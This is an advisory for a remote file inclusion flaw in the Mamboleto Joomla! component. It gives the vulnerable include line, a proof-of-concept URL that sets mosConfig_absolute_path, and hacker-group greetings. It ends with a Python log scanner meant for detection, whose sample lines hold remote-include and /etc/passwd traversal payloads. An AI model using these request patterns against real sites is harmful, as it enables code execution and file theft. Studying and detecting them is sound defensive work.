Mamboleto Joomla! component Remote File Include Vulnerability

2010-01-12 / 2010-01-13
Credit: Don Tukulesto
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/**************************************************************************
[!] Mamboleto Joomla! component Remote File Include Vulnerability
[!] Author   : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date     : December 10, 2009
[!] Tune In  : http://antisecradio.fm (choose your weapon)
**************************************************************************/

[ Software Information ]

[+] Vendor    : http://www.fernandosoares.com.br/
[+] Download  : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] New Mamboleto 2.0 RC3 for Joomla! 1.5.x in "legacy mode". Much improved, with two more banks (Sicredi and Bancoob) and a new VirtueMart integration module.
[+] Method    : Remote File Inclusion
[+] Dork      : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php, line 123

include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php');

The include path is built from $mosConfig_absolute_path, a global the script expects the Joomla! legacy layer to set; when mamboleto.php is requested directly with register_globals enabled, the value can instead be supplied in the query string.

[ Proof of Concept ]

http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU who called me a piece of shit, especially High school friends [ rm -rf yourself ]
[>] FOR MALINGSIAL

[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : watch out, there's a workman =))
[+] arianom says : Collect coins for Prita Mulyasari !!!
[+] Pathloader says : Okay then, if th... th... th... that's how it is :D
[+] tiw0L says : Don't eat it pleaseeeeee!!!
[+] kaMtiEz says : I'm not GAY <++++ That's slander, he won't admit it :p
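As an added defender-side example (not part of the advisory), the check below scans Apache access-log lines for requests that hand mosConfig_absolute_path to the vulnerable script and labels the supplied value. The script name and parameter come from the advisory above; the log lines and addresses are constructed, and the check goes slightly beyond the PoC by also recognising PHP stream wrappers and traversal values.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Script and parameter named in the advisory above.
VULN_SCRIPT = "com_mamboleto/mamboleto.php"
VULN_PARAM = "mosConfig_absolute_path"
# Value shapes that turn the include_once() into code from outside the web root.
REMOTE_SCHEME = re.compile(r"^(https?|ftps?)://", re.I)
PHP_WRAPPER = re.compile(r"^(php|data|expect|phar|zip)://", re.I)
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)|\x00")
# Apache combined access-log line; only the fields this check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def classify_value(value: str) -> str:
    # Label one client-supplied value of the include base path.
    if REMOTE_SCHEME.match(value):
        return "remote-include"
    if PHP_WRAPPER.match(value):
        return "stream-wrapper"
    if TRAVERSAL.search(value):
        return "traversal"
    # The script only expects this name via register_globals, never from the query string.
    return "unexpected-parameter"

def inspect_line(line: str) -> Optional[dict]:
    # Return a finding for one log line, or None when the line is not relevant.
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.endswith(VULN_SCRIPT):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM)
    if not values:
        return None
    return {"ip": m["ip"], "kind": classify_value(values[0]),
            "value": values[0], "status": int(m["status"])}

def scan(lines) -> list:
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2009:13:55:36 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=http://198.51.100.7/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2009:13:56:01 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.1" 200 123 "-" "-"',
    '192.0.2.10 - - [10/Dec/2009:13:57:12 +0000] "GET /index.php?option=com_mamboleto HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Dec/2009:13:58:40 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=/var/www/joomla HTTP/1.1" 200 300 "-" "-"',
]
```

Running scan(SAMPLE_LOG) flags three of the four lines; the plain index.php request is ignored.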

References:

http://xforce.iss.net/xforce/xfdb/54662
http://www.securityfocus.com/bid/37280
http://www.exploit-db.com/exploits/10369
http://packetstormsecurity.org/0912-exploits/joomlamamboleto-rfi.txt


Copyright 2024, cxsecurity.com